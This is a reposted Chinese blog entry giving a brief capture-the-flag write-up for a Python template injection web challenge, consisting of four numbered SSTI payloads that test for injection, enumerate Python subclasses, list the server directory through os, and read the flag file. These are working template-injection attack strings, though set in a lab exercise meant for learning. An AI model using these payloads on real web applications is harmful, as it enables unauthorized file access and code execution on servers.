码迷,mamicode.com
首页 > 编程语言 > 详细

攻防世界-web-高手进阶区011-Web_python_template_injection

时间:2020-03-12 18:47:17      阅读:479      评论:0      收藏:0      [点我收藏+]

标签:pytho   oba   模块   temp   mamicode   注入   bsp   sse   list   

1.判断存在python模块注入

{{7+7}}

 技术图片

 

 

2.{{‘‘.__class__.__mro__[2].__subclasses__()}}

 技术图片

 

 

3.{{‘‘.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[‘os‘].listdir(‘.‘)}}

 技术图片

 

 

4.{{‘‘.__class__.__mro__[2].__subclasses__()[40](‘fl4g‘).read()}}

 技术图片

 

 


 

攻防世界-web-高手进阶区011-Web_python_template_injection

标签:pytho   oba   模块   temp   mamicode   注入   bsp   sse   list   

原文地址:https://www.cnblogs.com/joker-vip/p/12470830.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!